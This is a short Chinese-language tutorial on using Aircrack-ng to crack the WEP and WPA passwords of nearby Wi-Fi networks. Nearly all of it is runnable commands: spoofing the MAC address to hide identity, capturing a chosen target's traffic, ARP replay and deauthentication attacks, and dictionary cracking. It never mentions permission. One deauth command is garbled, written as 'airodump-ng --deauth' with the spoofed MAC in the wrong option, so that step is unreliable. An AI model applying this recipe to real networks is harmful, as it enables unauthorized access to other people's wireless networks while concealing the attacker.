今天讲讲Aircrack-ng,这是一个基于破解无线802.11协议的wep及wpa-psk加密的工具。补充一点,这种破解方法是在网卡的基础上进行的。
破解wep加密的无线网络:现在命令行输入airmon-ng
查看当前系统的无线网络接口,假设这个无线接口为wlan2。下一步我们停止这个接口,然后设置mac掩码,隐藏真实的mac地址。停止命令为
airmon-ng stop wlan2
修改mac地址的命令为
macchanger --mac xxx掩码地址 wlan2
最后启动无线接口就能查看现在的接口信息,可以看见当前监听模式是启用的,映射网络接口是mon0
airmon-ng start wlan2
接下来是用airodump-ng命令来查看附近的无线网络
airodump-ng wlan2
这个查询是动态的,ctrl+c可以停止。可以看见里面有很多参数,其中需要记住的几个是bssid为无线ip地址,enc为加密方式,essid为ssid号,后面需要使用,还有就是ch信道号。
接下来就选择一个bssid地址攻击,需要用到airodump-ng,其中参数-c对应信道号,-w对应捕捉到数据的存储地址文件。
airodump-ng -c 信道号 -w 文件名 -bssid 目标mac地址 mon0
现在可以打开一个新的终端窗口来进行arp协助抓包,用到一个新的命令aireplay-ng,首先进行握手
aireplay-ng -1 0 -a 目标mac -h 我们设置的mac掩码-e essid值 mon0
再发送一些流量给无线路由器,使增强抓包力度
aireplay-ng -3 -b 目标mac地址 -h 我们设置的mac掩码 mon0
此时可以看见抓取的无线报文数目,等到两万作用差不多就可以开始破解了。
aircrack命令破解密码
aircrack-ng -b 目标mac 抓包文件名.cap
等待key found就可以获得密码。
破解wpa加密的无线网络:
抓包步骤与wep加密破解类似,流量攻击我们也可以采用deauth攻击。
airodump-ng --deauth 1 -a 目标mac地址 -c mac掩码 mon0
由于wpa加密较wep更加强力,所以我们需要准备一个字典,再使用aircrack命令暴力破解。
aircrack-ng -w 字典文件地址 抓到的cap包
待key found,密码就能破解。